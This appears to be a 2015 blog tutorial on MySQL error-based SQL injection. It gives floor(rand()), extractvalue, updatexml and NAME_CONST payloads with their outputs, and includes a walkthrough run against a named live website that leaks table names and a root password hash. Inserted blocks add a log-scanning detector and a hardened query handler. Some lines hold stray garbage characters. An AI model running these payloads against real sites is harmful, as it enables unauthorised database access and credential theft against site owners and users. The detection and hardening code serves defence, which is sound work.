MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted 2015-11-11 19:03:37

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version was successfully leaked through the error message. To retrieve other data, replace the version() expression with the subquery you want.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
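All three techniques above leave two recognisable traces: the probe itself in the request parameter, and a verbose MySQL error in the response. The following is an added example (not part of the original post) that flags both in web-server logs; the access-log format, the client addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlparse

# Signatures of the three error-based techniques above: floor(rand(0)*2) under GROUP BY,
# extractvalue() and updatexml(). Matched on a decoded, lower-cased, whitespace-collapsed
# parameter value so that URL encoding and case changes do not hide them.
SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
}

# The MySQL error strings the post shows reaching the client. Any of these in a
# response body means the application echoes database errors verbatim.
LEAK_PATTERNS = [
    re.compile(r"ERROR 1062 \(23000\): Duplicate entry '.*' for key '\w+'"),
    re.compile(r"ERROR 1105 \(HY000\): XPATH syntax error: '.*'"),
]

def normalise(value: str) -> str:
    # Decode %xx and '+' (query strings use '+' for space), then collapse whitespace.
    return " ".join(unquote_plus(value).split()).lower()

def classify(value: str) -> list:
    """Names of the error-based techniques whose signature appears in one parameter value."""
    text = normalise(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def leaks_db_error(body: str) -> bool:
    return any(rx.search(body) for rx in LEAK_PATTERNS)

def scan_access_log(lines) -> list:
    """Return (parameter name, techniques) for every request parameter that matches."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m: continue  # not a GET request line
        for key, value in parse_qsl(urlparse(m.group(1)).query, keep_blank_values=True):
            kinds = classify(value)
            if kinds:
                hits.append((key, kinds))
    return hits

# Constructed access-log lines (not from the post); the second carries the
# extractvalue() probe from section 2 against the id parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /content/detail.php?id=330&sid=19 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [11/Nov/2015:19:04:02 +0800] "GET /content/detail.php?id=330+and+extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 312',
]
```

Run `scan_access_log(SAMPLE_LOG)` to get the flagged parameters; pair it with `leaks_db_error()` on response bodies to confirm the application is actually returning the engine's error text.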



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)
|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables
Let's try it out on my site...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'


Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.
: \* b% s4 x7 C) E9 _5 b; b0 `% l9 z( I/ @. I8 P# `' T4 p
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.
) `  N3 g- q/ ?: e, t: S8 ~" _9 H' x  u8 T7 {
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
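The NAME_CONST walkthrough above, like the floor, extractvalue and updatexml variants in sections 1 to 3, depends on the same two application defects: the id parameter is spliced into the statement, and the engine's error text is sent back to the client. As an added example (not from the post or the quoted tutorial), here is such a detail handler beside a hardened form; sqlite3 and the in-memory rows are assumptions so it runs offline.

```python
import sqlite3

# Constructed in-memory stand-in for the post's `article` table. sqlite3 has no
# NAME_CONST/extractvalue, but the two defects being shown are engine-independent.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("create table article(id integer primary key, title text, content text)")
    db.executemany("insert into article values (?, ?, ?)",
                   [(1, "test", "do it"), (2, "draft", "not public")])
    return db

# Assumed server-side log; the hardened handler writes error detail here, never to the client.
SERVER_LOG = []

def vulnerable_detail(db: sqlite3.Connection, raw_id: str) -> str:
    # detail.php?id=... as the targets in the post behave: the parameter is concatenated
    # into the statement and the raw exception text goes into the response body.
    try:
        rows = db.execute(f"select title from article where id = {raw_id}").fetchall()
        return ", ".join(r[0] for r in rows) or "not found"
    except sqlite3.Error as e:
        return f"Error: {e}"   # this line is the error-based channel

def hardened_detail(db: sqlite3.Connection, raw_id: str) -> str:
    # Enforce the type the parameter is supposed to have, bind it as a placeholder,
    # and answer any database error with a fixed message.
    if not raw_id.isdigit():
        return "bad request"
    try:
        rows = db.execute("select title from article where id = ?",
                          (int(raw_id),)).fetchall()
        return ", ".join(r[0] for r in rows) or "not found"
    except sqlite3.Error as e:
        SERVER_LOG.append(str(e))
        return "internal error"
```

With the extractvalue() probe from section 2 as the id value, the vulnerable handler returns the engine's message (`Error: no such function: extractvalue` under sqlite3, the XPATH error under MySQL), while the hardened one answers `bad request` before any SQL is built.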